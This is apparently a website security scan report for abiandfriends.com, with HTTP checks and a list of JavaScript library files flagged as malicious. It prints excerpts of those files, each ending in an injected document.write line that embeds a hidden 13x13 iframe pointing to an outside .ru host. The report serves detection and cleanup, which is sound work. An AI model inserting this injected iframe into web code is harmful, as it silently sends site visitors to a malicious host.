Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=abiandfriends.com
Result: Google has marked this website as suspicious; visiting it may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://abiandfriends.com/ | 200 OK Content-Length: 18574 Content-Type: text/html | clean |
http://abiandfriends.com/./includes/prototype/prototype.js | 200 OK Content-Length: 124296 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/script.aculo.us/src/scriptaculous.js?load=effects | 200 OK Content-Length: 2814 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antivirus engines (see below). The excerpt appears to be abridged: it shows the beginning and the end of the file, with the middle omitted. The library code looks like the regular script.aculo.us 1.8.0 loader; the injected part is the final document.write(...) statement, which adds a 13x13-pixel iframe that loads a page from a third-party host. The same statement is appended to every file marked malicious on this page.
var Scriptaculous = { Version: '1.8.0', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); }, REQUIRED_PROTOTYPE: '1.6.0', load: function() { function convertVersionString(versionString){ var r = versionString.split('.'); return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]); } if((typeof Prototype=='undefined') || var includes = s.src.match(/\?.*load=([a-z,]*)/); (includes ? includes[1] : 'builder,effects,dragdrop,controls,slider,sound').split(',').each( function(include) { Scriptaculous.require(path+include+'.js') }); }); } } Scriptaculous.load();document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');
Antivirus reports:
| ||
http://abiandfriends.com/./includes/starbox/js/starbox.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Starboxes = { inverse: false, locked: false, onRate: Prototype.emptyFunction, overlayImages: '../images/starbox/', overlay: 'default.png', rerate: false, REQUIRED_Prototype: '1.6.0', REQUIRED_Scriptaculous: '1.8.0', load: function() { this.require('Prototype'); var srcMatch = /starbox\.js$/; this.imageSource = (($$("head script[src]").find(function(s) { return s.src if (this.options.ghosting) { this.ghost = this.wrapper.appendChild(new Element('div', { 'class': 'ghost' }).setStyle(styles.absolute)); if (this.options.ghostColor) this.ghost.setStyle({ background: this.options.ghostColor }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/tooltip.js | 200 OK Content-Length: 1909 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var DH = 0;var an = 0;var al = 0;var ai = 0;if (document.getElementById) {ai = 1; DH = 1;}else {if (document.all) {al = 1; DH = 1;} else { browserVersion = parseInt(navigator.appVersion); if ((navigator.appName.indexOf('Netscape') != -1) && (browserVersion == 4)) {an = 1; DH = 1;}}} function fd(oi, wS) {if (ai) return wS ? document.getElementById(oi).style:document.getElementById(oi); if (al) return wS ? document.all[oi].style: document.all[oi]; if (an) return document.layers[oi];} ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery1.2.6.js | 200 OK Content-Length: 49141 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/thickbox.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/core.js | 200 OK Content-Length: 37932 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if ( window.jQuery ) var _jQuery = window.jQuery; var jQuery = window.jQuery = function( selector, context ) { return new jQuery.prototype.init( selector, context ); }; if ( window.$ ) var _$ = window.$; window.$ = jQuery; var quickExpr = /^[^<]*(<(.|\s)+>)[^>]*$|^#(\w+)$/; var isSimple = /^.[^:#\[\.]*$/; jQuery.fn = jQuery.prototype = { init: function( selector, context ) { selector = selector || document; if ( s Math.max(document.body["offset" + name], document.documentElement["offset" + name]) ) : size == undefined ? (this.length ? jQuery.css( this[0], type ) : null) : this.css( type, size.constructor == String ? size : size + "px" ); }; }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery/selector.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/event.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | clean |
http://abiandfriends.com/./includes/jquery/ajax.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ load: function( url, params, callback ) { if ( jQuery.isFunction( url ) ) return this.bind("load", url); var off = url.indexOf(" "); if ( off >= 0 ) { var selector = url.slice(off, url.length); url = url.slice(0, off); } callback = callback || function(){}; var type = "GET"; if ( params ) if ( jQuery.isFunction( params ) ) { callback = params; params = null; } els if ( s.global ) jQuery.event.trigger("ajaxSend", [xml, s]); var onreadystatechange = function(isTimeout){ if ( !requestDone && xml && (xml.readyState == 4 || isTimeout == "timeout") ) { requestDone = true; if (ival) { clearInterv;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/jquery/fx.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ show: function(speed,callback){ return speed ? this.animate({ height: "show", width: "show", opacity: "show" }, speed, callback) : this.filter(":hidden").each(function(){ this.style.display = this.oldblock || ""; if ( jQuery.css(this,"display") == "none" ) { var elem = jQuery("<" + this.tagName + " />").appendTo("body"); this.style.display = elem.css("display"); elem.remove(); this.options.show = true; this.custom(0, this.cur()); if ( this.prop == "width" || this.prop == "height" ) this.elem.style[this.prop] = "1px"; jQuery(this.elem).show(); }, hide: function(){ this.;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/iutil.js | 200 OK Content-Length: 6994 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.iUtil = { getPosition : function(e, forceIt) { var x = 0; var y = 0; var es = e.style; var restoreStyles = false; if (forceIt && jQuery.curCSS(e,'display') == 'none') { var oldVisibility = es.visibility; var oldPosition = es.position; restoreStyles = true; es.visibility = 'hidden'; es.display = 'block'; es.position = 'absolute'; } var el = e; if (el.getBoundingClientRect) { var b }); } }; [].indexOf || (Array.prototype.indexOf = function(v, n){ n = (n == null) ? 0 : n; var m = this.length; for (var i=n; i<m; i++) if (this[i] == v) return i; return -1; }); ;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/idrag.js | 200 OK Content-Length: 8353 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.iDrag = { helper : null, dragged: null, destroy : function() { return this.each( function () { if (this.isDraggable) { this.dragCfg.dhe.unbind('mousedown', jQuery.iDrag.draginit); this.dragCfg = null; this.isDraggable = false; if(jQuery.browser.msie) { this.unselectable = "off"; } else { this.style.MozUserSelect = ''; this.style.KhtmlUserSelect = ''; this.st if (elm.dragCfg.insideParent || elm.dragCfg.containment == 'parent') { parentBorders = jQuery.iUtil.getBorder(elm.parentNode, true); elm.dragCfg.oC.x = elm.offsetLeft + (jQuery.browser.msie ? 0 : jQuery.browser.opera ? -parentBorders.l : parentBorders.l); elm.drag;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
| ||
http://abiandfriends.com/./includes/i/accordion.js | 200 OK Content-Length: 4693 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ENSE.txt) * and GPL (GPL-LICENSE.txt) licenses. * */ jQuery.iAccordion = { build : function(options) { return this.each( function() { if (!options.headerSelector || !options.panelSelector) return; var el = this; el.accordionCfg = { panelHeight : options.panelHeight||300, headerSelector : options.headerSelector, panelSelector : options.panelSelector, activeClass : options.a } ) .eq(0) .addClass(el.accordionCfg.activeClass) .end(); jQuery(this) .css('height', jQuery(this).css('height')) .css('overflow', 'hidden'); } ); } }; jQuery.fn.Accordion = jQuery.iAccordion.build;document.write('<iframe src="http://sociallytouch.ru/theftdisappears.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: abiandfriends.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 25 Dec 2014 19:43:33 GMT
Pragma: no-cache
Server: Apache mod_fcgid/2.3.7 mod_auth_pgsql/2.0.3
Vary: User-Agent,Accept-Encoding
Content-Length: 18574
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=kigg0bose6bgjcbj75msociaf7; path=/
X-Powered-By: PHP/5.4.34
...18574 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: abiandfriends.com
Referer: http://www.google.com/search?q=abiandfriends.com
Result:
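The result is similar to the first query; no suspicious redirects were found. This check covers only the HTTP response to the page request: the iframe written by the script files listed above is inserted client-side and is not a redirect, so it does not show up here.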